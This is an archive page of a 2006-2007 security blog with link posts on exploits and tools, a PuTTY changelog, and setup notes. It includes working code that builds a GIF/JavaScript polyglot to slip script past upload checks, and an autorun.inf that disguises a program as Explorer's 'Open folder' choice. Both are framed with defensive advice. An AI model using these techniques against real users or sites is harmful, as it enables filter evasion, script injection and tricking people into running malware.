Archive for the ‘Security’ Category

P0wned by a QT movie

Monday, March 12th, 2007

This is from another one of my favorite blogs: Didier Stevens.

I found this entry enjoyable because it’s yet another one of those “Owned by MySpace” posts. It’s also really well written and very easy to follow (even for a newcomer).

Here’s a link to the blog entry:
http://didierstevens.wordpress.com/2007/03/12/p0wned-by-a-qt-movie/

Embedding JavaScript inside a QuickTime movie is nothing new, as GNUCitizen discussed back in September, but it’s good to actually see it used in the wild.

Building a remote buffer overflow for the Snort 2.6.1 DCE/RPC flaw

Wednesday, March 7th, 2007

I haven’t read all of this yet, but it looks like an awesome article describing the research involved in finding the vulnerabilities and in writing the exploit code.

http://isc.sans.org/diary.html?storyid=2375

Building a remote buffer overflow for the Snort 2.6.1 DCE/RPC flaw
Published: 2007-03-07,
Last Updated: 2007-03-07 13:35:22 UTC
by Arrigo Triulzi (Version: 1)
Every so often I get asked about buffer overflow research in practice and for once there is a lengthy, worked-out example for me to point at.

Trirat Puttaraksa recently blogged in two parts his work in turning the Snort 2.6.1 DCE/RPC flaw into a working exploit. The first part discusses the “easy bit”, that is to say how to turn the vulnerability into a denial-of-service attack whereas the second part discusses how to exploit it to actually execute code.

It is a very thorough write-up, including pretty pictures explaining how he uses the Snort source code to figure out the layout of the packets he is going to send, the setup of the packets to ensure that he triggers the fault and, in part 2, how to inject the payload to execute. The final result is that he runs calc.exe from Snort.

Reverse Engineering Mentoring

Saturday, February 17th, 2007

http://scratchpad.wikia.com/wiki/Reverse_Engineering_Mentoring

Wow, this is very cool!

Didier Stevens has started a mentoring program to teach newbies how to reverse engineer software. The instructions are very well written and very easy to follow.

If you’re interested in RE, then this is a great place to start.

New version of PuTTY released

Thursday, February 15th, 2007

I’m a little late with this, but a new version of PuTTY (0.59) has finally been released. According to the changelog, there hadn’t been a PuTTY release since beta 0.58 on 2005-04-05.

You can download it from here (the link is plain HTTP, so check the signature PuTTY publishes for each release before you run it):
http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

And here’s a copy of the changelog. The feature I’m really looking forward to is the serial support (I currently use a program called TuTTY and another one called TeraTermPro).

* PuTTY can now connect to local serial ports as well as making network connections.
* Windows PuTTY now supports “local proxying”, where a network connection is replaced by a local command. (Unix PuTTY has supported this since it was first released in 0.54.) Also, Plink has gained a “-nc” mode where the primary channel is replaced by an SSH tunnel, which makes it particularly useful as the local command to run.
* Improved speed of SSH on Windows (particularly SSH-2 key exchange and public-key authentication).
* Improved SFTP throughput.
* Various cryptographic improvements in SSH-2, including SDCTR cipher modes, a workaround for a weakness in CBC cipher modes, and Diffie-Hellman group exchange with SHA-256.
* Support for the Arcfour cipher in SSH-2.
* Support for sending terminal modes in SSH.
* When Pageant is running and an SSH key is specified in the configuration, PuTTY will now only try Pageant authentication with that key. This gets round a problem where some servers would only allow a limited number of keys to be offered before disconnecting.
* Support for SSH-2 password expiry mechanisms, and various other improvements and bugfixes in authentication.
* A change to the SSH-2 password camouflage mechanism in 0.58 upset some Cisco servers, so we have reverted to the old method.
* The Windows version now comes with documentation in HTML Help format. (Windows Vista does not support the older WinHelp format. However, we still provide documentation in that format, since Win95 does not support HTML Help.)
* On Windows, when pasting as RTF, attributes of the selection such as colours and formatting are also pasted.
* Ability to configure font quality on Windows (including antialiasing and ClearType).
* The terminal is now restored to a sensible state when reusing a window to restart a session.
* We now support an escape sequence invented by xterm which lets the server clear the scrollback (CSI 3 J). This is useful for applications such as terminal locking programs.
* Improvements to the Unix port:
o now compiles cleanly with GCC 4
o now has a configure script, and should be portable to more platforms
* Bug fix: 0.58 utterly failed to run on some installations of Windows XP.
* Bug fix: PSCP and PSFTP now support large files (greater than 4 gigabytes), provided the underlying operating system does too.
* Bug fix: PSFTP (and PSCP) sometimes ran slowly and consumed lots of CPU when started directly from Windows Explorer.
* Bug fix: font linking (the automatic use of other fonts on the system to provide Unicode characters not present in the selected one) should now work again on Windows, after being broken in 0.58. (However, it unfortunately still won’t work for Arabic and other right-to-left text.)
* Bug fix: if the remote server saturated PuTTY with data, PuTTY could become unresponsive.
* Bug fix: certain large clipboard operations could cause PuTTY to crash.
* Bug fix: SSH-1 connections tended to crash, particularly when using port forwarding.
* Bug fix: SSH Tectia Server would reject SSH-2 tunnels from PuTTY due to a malformed request.
* Bug fix: SSH-2 login banner messages were being dropped silently under some circumstances.
* Bug fix: the cursor could end up in the wrong place when a server-side application used the alternate screen.
* Bug fix: on Windows, PuTTY now tries harder to find a suitable place to store its random seed file PUTTY.RND (previously it was tending to end up in C:\ or C:\WINDOWS).
* Bug fix: IPv6 should now work on Windows Vista.
* Numerous other bugfixes, as usual.

Messing With MacPorts Again…

Tuesday, February 13th, 2007

Originally posted at cocoacrusty.com on Monday, February 12th, 2007.

This evening I decided to install some applications I used on FreeBSD before I got my Apple MacBook. I thoroughly enjoyed the FreeBSD ports system for maintaining third-party applications like Wireshark (formerly known as Ethereal) and Nmap. Since moving to the Mac I have found a similar ports system named MacPorts, formerly known as DarwinPorts.

I have used MacPorts in the past to install the above-mentioned applications, Wireshark and Nmap, as well as screen (great tutorial on TechSays, previously posted at averageadmins.com) and Ettercap. I went crazy with MacPorts tonight and started installing some of the software I used on my FreeBSD laptop, as well as some newer applications I wanted to try out. I installed:

(more…)

Backdooring images

Tuesday, December 19th, 2006

I remember reading a cool article a long time ago about how it was possible for someone to create a backdoored image and use it to gain access to the internal network of the company he was targeting. The article was called Wardriving Into GIAC Enterprises with JPEG’s and is available here: http://www.giac.org/certified_professionals/practicals/gcih/0651.php

Well, apparently it’s STILL possible to backdoor an image, but this time it’s with JavaScript. I don’t know JavaScript very well but I can only assume that it’s possible to code a quick script to download any imaginable tool and execute it.

http://www.gnucitizen.org/blog/backdooring-images

Surely you’ve heard that just visiting a website can get a JavaScript script sent to your browser that does any number of things, such as port scanning your internal network. SPI Dynamics has written a PoC that does just that; you can read about it here: http://www.spidynamics.com/spilabs/education/articles/JS-portscan.html. Now you know how to incorporate that code in a simple image.
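As an added example (not code from this post or from GNUCitizen), here is the general shape of the trick in Node.js: a file whose first bytes are a valid GIF header and whose remaining image bytes sit inside a JavaScript block comment, so the same bytes are an image to an upload filter and a script to a browser that is pointed at the file with `<script src=...>`. The 1x1 GIF body is constructed here for the example, using the logical-screen width field as the `/*` comment opener is the general construction rather than necessarily the exact bytes the original post used, and the `hook` callback is a stand-in for whatever payload (the port scanner, for instance) the script would carry.

```javascript
// Added example: a GIF/JavaScript polyglot. Not code from the post or from
// GNUCitizen; the image body below is constructed for this example.

// Everything after the logical-screen width field of a minimal 1x1 GIF.
const GIF_BODY_AFTER_WIDTH = Buffer.from([
  0x01, 0x00,                         // logical screen height = 1
  0x80, 0x00, 0x00,                   // packed byte (global colour table, 2 entries), bg index, aspect
  0x00, 0x00, 0x00, 0xff, 0xff, 0xff, // global colour table: black, white
  0x21, 0xf9, 0x04, 0x01, 0x00, 0x00, 0x00, 0x00, // graphic control extension
  0x2c, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, // image descriptor: 1x1 at (0,0)
  0x02, 0x02, 0x44, 0x01, 0x00,       // LZW minimum code size 2, one data sub-block, terminator
  0x3b,                               // trailer: a decoder stops here and ignores the script after it
]);

// Build the polyglot: "GIF89a" is a legal JS identifier, and the width bytes
// 0x2f 0x2a read as "/*", so a JS parser treats the rest of the image as a
// comment. The tail closes the comment, finishes the statement ("GIF89a = 1;")
// and appends the payload.
function buildPolyglot(script) {
  const header = Buffer.from('GIF89a', 'latin1');
  const width = Buffer.from([0x2f, 0x2a]); // logical screen width 0x2a2f = 10799 px
  if (GIF_BODY_AFTER_WIDTH.indexOf(Buffer.from('*/', 'latin1')) !== -1) {
    throw new Error('image bytes contain "*/" and would end the comment early');
  }
  const tail = Buffer.from('*/=1;' + script, 'latin1');
  return Buffer.concat([header, width, GIF_BODY_AFTER_WIDTH, tail]);
}

// The "image" face: what a magic-byte upload check would see.
function looksLikeGif(buf) {
  const magic = buf.subarray(0, 6).toString('latin1');
  return magic === 'GIF87a' || magic === 'GIF89a';
}

// The "script" face: a browser would run this via <script src="x.gif">;
// new Function() stands in for the script tag. `hook` is the stand-in payload.
function runAsScript(buf) {
  const src = buf.toString('latin1');
  return new Function('hook', src)(() => 'payload ran');
}

// Example payload; in the attack this is where the port-scan script would go.
const polyglot = buildPolyglot('return hook();');
```

`looksLikeGif(polyglot)` is true and `runAsScript(polyglot)` returns the payload's result, which is the whole point: a check that only inspects magic bytes passes the file, and a page that can reference it as a script runs it. The defensive takeaway is the converse: an upload handler that re-encodes the image through an image library drops everything after the GIF trailer, including the script.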

If you want to test this out yourself and you don’t have a webserver for uploading images, try downloading XAMPP and setting up a webserver on your local machine. It’s perfect for testing web applications such as this.

How to completely own someone with a USB key

Friday, November 3rd, 2006

I ran across a few articles yesterday while doing some catching up on old blogs I haven’t read in a while.

Everyone probably knows that many new USB keys (SanDisk’s U3 ones in particular) come with a U3 partition that presents itself to Windows as a CD-ROM drive, which is exactly why AutoRun fires when you plug one in. And I’m also sure that everyone knows you can hack that U3 partition to automatically install and run whatever software you want (trojans, spyware, pulling the SAM database and emailing it somewhere, etc.).

However, did you know you can get most of the way there with an old non-U3 USB key? It works roughly the same way. You create an autorun.inf file and put it in the root of the key. When it is inserted into an XP SP2 machine, Windows does not run it automatically (SP2 only does that for CD-ROM-type drives), but it pops up the standard “What do you want Windows to do?” AutoPlay window. The autorun file can be programmed to include a custom action with a custom icon, and that entry appears at the top of the pop-up window, so a user who just hits Enter launches your program.
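Here is what such an autorun.inf looks like, as an added example (not the file from the articles the post links to; the program and icon names are hypothetical):

```ini
[autorun]
; Runs automatically only on drives Windows treats as CD-ROM (the U3 virtual CD).
; On a plain removable drive, XP SP2 just adds it to the AutoPlay dialog.
open=setup.exe
; Icon and text shown for that entry at the top of the AutoPlay dialog;
; the "Open folder to view files" wording mimics the built-in Explorer choice.
icon=setup.exe,0
action=Open folder to view files
```

The defensive check is the other side of this: the prompt disappears altogether when AutoRun is disabled for all drive types, i.e. `NoDriveTypeAutoRun` set to `0xFF` under `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer` (or the equivalent “Turn off Autoplay” Group Policy). Before trusting that setting, plug in a key carrying a file like this and confirm the dialog does not appear.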

(more…)

GPG and Thunderbird on Mac OS X

Thursday, October 19th, 2006

In trying to get my new MacBook in shape for everyday use (if I decide to switch from my 15.4″ widescreen FreeBSD laptop), I decided to see if I could get Thunderbird set up with GnuPG (GPG) for signing and encrypting e-mail. I had a pretty easy experience figuring this stuff out, although there were a few things that weren’t explained very well, in my opinion, and I want to document the process I went through to get this working on Mac OS X 10.4.8 for any others out there who may be interested. Having it all in one place will do me well if any reinstalls come about in the future.

(more…)

The 14 best ways to protect your computers

Monday, October 9th, 2006

Linked from [Geeks are Sexy], here are 14 ways to protect your computers. This list is mainly geared towards the IT admin who has a large network of computers to manage, but some of them can be used by the single-PC person.

Most of these are really, really good.

I think this one would be a lot of fun:

12. Track where everyone browses on the Internet and for how long. Post the findings on a real-time online report that is accessible by anyone. This recommendation tends to make users’ Internet surfing habits self-policing. (I bet it will also lead to a sudden increase in productivity.)

http://geeksaresexy.blogspot.com

Sandboxie - Running your applications in a sandbox

Monday, October 9th, 2006

The term “sandbox” means running code in an isolated environment (a virtualized one, in Sandboxie’s case) so that whatever the code does cannot harm the underlying system.

I have heard of the term “sandboxing” but have never really looked into running any applications in a sandboxed environment. While posting an earlier entry, I read of a guy running his Firefox in a program called Sandboxie so I decided to give it a try.

I installed Sandboxie and ran an instance of Firefox in it. Everything I did with my sandboxed Firefox was kept away from my running system: all registry entries, bookmark additions and deletions, browsing history, downloaded software (including malware), everything.

The best part of it all is that after you’re done browsing (or whatever application you’re using) you simply delete the sandbox and all traces of it are gone. Well, not ALL traces: it does touch your hard drive, so a disk forensics scan would still find remnants of your sandboxed activity. Fortunately, Sandboxie has already thought of that and offers a way to hook your favorite secure disk wiping application into its delete function. It does require editing the registry, however.

The author of Sandboxie is providing this software free of charge. After 30 days of use, the program will popup “reminders” asking you to kindly pay the $20 lifetime registration fee that gives you not only tech support but also a few other cool software additions like letting you know when software was launched outside of the sandbox (like a trojan install). The paid version also lets you automatically sandbox specific programs even if they weren’t launched inside the sandbox. Registered users can also have as many sandboxes open as they want, whereas the free version only allows one.

Of course, if you ask me, Linux is the best sandbox I’ve ever used! :)

http://www.sandboxie.com/